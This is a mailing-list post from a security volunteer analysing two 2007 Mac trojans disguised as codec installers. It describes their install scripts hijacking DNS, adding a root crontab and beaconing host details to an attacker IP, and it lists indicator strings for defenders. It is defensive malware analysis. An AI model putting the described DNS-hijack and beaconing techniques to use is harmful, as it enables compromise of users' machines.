To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
I've analyzed two variants of this trojan, procoded1000.dmg and
ultracodec1000.dmg, provided to me by Chris (thanks, Chris!).

These trojans basically consist of three scripts and a browser plugin
(used by Safari / Firefox?  I'm not sure.).

On the disk image:
- install.pkg/Contents/Resources/post{install,upgrade} are the same
script
- install.pkg/Contents/Resources/pre{install,upgrade} are the same script
- plugins.settings (from Archive.pax.gz, located in install.pkg/Contents) is
the same as above preinstall scripts

Only difference between two packages appears to be the dns servers:
procodec1000:
s1=85.255.116.61
s2=85.255.112.103

ultracodec1000:
s1=85.255.115.34
s2=85.255.112.158

- Preinstall scripts (and plugins.settings from Archive.pax.gz, which
is the same) sets the compromised machine's DNS to the above servers
(depending on which trojan is installed).  In addition, it tries to set
a crontab for root that executes itself (as
/Library/Internet Plug-Ins/plugins.settings) once a minute.

- Postinstall scripts executes sendreq (found in Archive.pax.gz), and
then removes sendreq.  sendreq sends 'mac;<cpu type>;<hostname>' as a
base64-encoded argument to the 'Accept-Language' header to
85.255.121.37.

Example:
GET / HTTP/1.1
Host: 85.255.121.37

- Installs
/Library/Internet
Plug-Ins/Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
I'm not certain what this does.  There's not much by way of suspicious
strings in this executable, and I don't have a way to safely execute it
to watch what it does.

Interesting strings (for antivirus or overly suspcious sysadmins :) ):
install.pkg/Contents/Resources/English.lproj/Description.plist:
<string>Its a suppa puppa desc yo</string>

In Archive.pax.gz:
Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak:
Verified RoveSupa Plugin

Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE:
Verified RoveSupa Plugin

On Sun, Nov 04, 2007 at 09:11:03AM -0500, Chris Lee babbled thus:

--
PinkFreud
Chief of Security, Nightstar IRC network